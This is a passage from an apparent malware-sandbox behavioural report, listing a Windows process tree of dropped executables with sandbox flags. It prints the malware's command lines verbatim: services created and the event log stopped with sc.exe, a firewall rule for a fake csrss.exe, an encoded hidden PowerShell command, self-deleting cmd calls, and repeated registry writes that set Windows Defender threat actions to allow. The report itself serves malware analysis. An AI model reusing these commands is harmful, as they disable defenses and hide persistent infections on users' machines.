  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  PID:5268
- C:\Users\Admin\Documents\GuardFox\_f4qhCf0V96ULomnMJBT6ZYw.exe
  "C:\Users\Admin\Documents\GuardFox\_f4qhCf0V96ULomnMJBT6ZYw.exe"
  2⤵
  - Executes dropped EXE
  PID:5280
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:1460
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:5952
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2264
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:936
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:1468
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "PHSWJLZY"
    3⤵
    - Launches sc.exe
    PID:3144
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "PHSWJLZY" binpath= "C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:1240
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5192
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "PHSWJLZY"
    3⤵
    - Launches sc.exe
    PID:628
- C:\Users\Admin\Documents\GuardFox\YS5WX7w7h1C8FiujhDjhoYut.exe
  "C:\Users\Admin\Documents\GuardFox\YS5WX7w7h1C8FiujhDjhoYut.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5288
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2088
    3⤵
    - Program crash
    PID:3352
- C:\Users\Admin\Documents\GuardFox\1oZdRn6Lg7UjbbxQsKZU0axb.exe
  "C:\Users\Admin\Documents\GuardFox\1oZdRn6Lg7UjbbxQsKZU0axb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 2132
    3⤵
    - Program crash
    PID:5296
- C:\Users\Admin\Documents\GuardFox\UzKIBfmjFNozZXyrAyTGxD4s.exe
  "C:\Users\Admin\Documents\GuardFox\UzKIBfmjFNozZXyrAyTGxD4s.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:5324
- - C:\Users\Admin\AppData\Local\Temp\is-C20U3.tmp\UzKIBfmjFNozZXyrAyTGxD4s.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-C20U3.tmp\UzKIBfmjFNozZXyrAyTGxD4s.tmp" /SL5="$204A6,1513159,56832,C:\Users\Admin\Documents\GuardFox\UzKIBfmjFNozZXyrAyTGxD4s.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5740
  - - C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe
      "C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe" -i
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4132
  - - C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe
      "C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe" -s
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:2572
- C:\Users\Admin\Documents\GuardFox\R73AhOT__GA6HZOWmJT_6PE6.exe
  "C:\Users\Admin\Documents\GuardFox\R73AhOT__GA6HZOWmJT_6PE6.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  PID:5360
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\GuardFox\R73AhOT__GA6HZOWmJT_6PE6.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:3800
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:5604
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 2120
    3⤵
    - Program crash
    PID:5504
- C:\Users\Admin\Documents\GuardFox\08Pe92t38IhUjdjelmkTU5Aq.exe
  "C:\Users\Admin\Documents\GuardFox\08Pe92t38IhUjdjelmkTU5Aq.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5368
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 748
    3⤵
    - Program crash
    PID:4916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 788
    3⤵
    - Program crash
    PID:5760
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 808
    3⤵
    - Program crash
    PID:1436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 816
    3⤵
    - Program crash
    PID:5880
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 968
    3⤵
    - Program crash
    PID:5172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1000
    3⤵
    - Program crash
    PID:5228
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1356
    3⤵
    - Program crash
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "08Pe92t38IhUjdjelmkTU5Aq.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\08Pe92t38IhUjdjelmkTU5Aq.exe" & exit
    3⤵
    PID:1660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "08Pe92t38IhUjdjelmkTU5Aq.exe" /f
      4⤵
      Kills process with taskkill
      PID:4900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1484
    3⤵
    - Program crash
    PID:5000
- C:\Users\Admin\Documents\GuardFox\9QiHXYjbvykQRsyWHraOQHU3.exe
  "C:\Users\Admin\Documents\GuardFox\9QiHXYjbvykQRsyWHraOQHU3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5380
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2888
- - C:\Users\Admin\Documents\GuardFox\9QiHXYjbvykQRsyWHraOQHU3.exe
    "C:\Users\Admin\Documents\GuardFox\9QiHXYjbvykQRsyWHraOQHU3.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks for VirtualBox DLLs, possible anti-VM trick
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    PID:696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:2484
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:1140
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:5816
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:4248
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:4776
- C:\Users\Admin\Documents\GuardFox\4Bt0hCDPbeDogzYRepH92ntN.exe
  "C:\Users\Admin\Documents\GuardFox\4Bt0hCDPbeDogzYRepH92ntN.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  PID:5720
- - C:\Users\Admin\Documents\GuardFox\4Bt0hCDPbeDogzYRepH92ntN.exe
    "C:\Users\Admin\Documents\GuardFox\4Bt0hCDPbeDogzYRepH92ntN.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2336
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 568
      4⤵
      Program crash
      PID:764
- C:\Users\Admin\Documents\GuardFox\qnXOl8WkCMEDE23eyGbEJpcm.exe
  "C:\Users\Admin\Documents\GuardFox\qnXOl8WkCMEDE23eyGbEJpcm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1860
- C:\Users\Admin\Documents\GuardFox\OlHIbQCQzMDwcktuUDGh8kb_.exe
  "C:\Users\Admin\Documents\GuardFox\OlHIbQCQzMDwcktuUDGh8kb_.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - outlook_office_path
  - outlook_win_path
  PID:5792
- C:\Users\Admin\Documents\GuardFox\cbfpM7BTr6beIVth9NAXnP2K.exe
  "C:\Users\Admin\Documents\GuardFox\cbfpM7BTr6beIVth9NAXnP2K.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  PID:5852
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 372
      4⤵
      Program crash
      PID:2524
- C:\Users\Admin\Documents\GuardFox\qUa84PMRJDEifvgn16InDLia.exe
  "C:\Users\Admin\Documents\GuardFox\qUa84PMRJDEifvgn16InDLia.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5864
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 580
      4⤵
      Program crash
      PID:5404
- C:\Users\Admin\Documents\GuardFox\pwZ35FqiU3OeBSS0JTof8T37.exe
  "C:\Users\Admin\Documents\GuardFox\pwZ35FqiU3OeBSS0JTof8T37.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:4444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4196

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1420

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4248

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2336 -ip 2336
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5368 -ip 5368
1⤵
PID:1952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5196 -ip 5196
1⤵
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4824 -ip 4824
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5368 -ip 5368
1⤵
PID:5520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5368 -ip 5368
1⤵
PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5368 -ip 5368
1⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5368 -ip 5368
1⤵
PID:3208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5368 -ip 5368
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5288 -ip 5288
1⤵
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5368 -ip 5368
1⤵
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5368 -ip 5368
1⤵
PID:912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5124
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5784

C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe
C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2100
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:1780
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:5272
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:4960
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5128
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1244
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5312 -ip 5312
1⤵
PID:1468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5000 -ip 5000
1⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5932 -ip 5932
1⤵
PID:4316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5816 -ip 5816
1⤵
PID:2124

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5376 -ip 5376
1⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5360 -ip 5360
1⤵
PID:364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1776 -ip 1776
1⤵
PID:2888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
1⤵
PID:5720

C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV\NbBDRdHfNISsgbl\EaxuNLp.exe
C:\Users\Admin\AppData\Local\Temp\gmxkDJhHlRjfIVLLV\NbBDRdHfNISsgbl\EaxuNLp.exe Y6 /ytsite_idveE 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1140
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3576
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4188
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5908
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:912
- - C:\Windows\SysWOW64\reg.exe
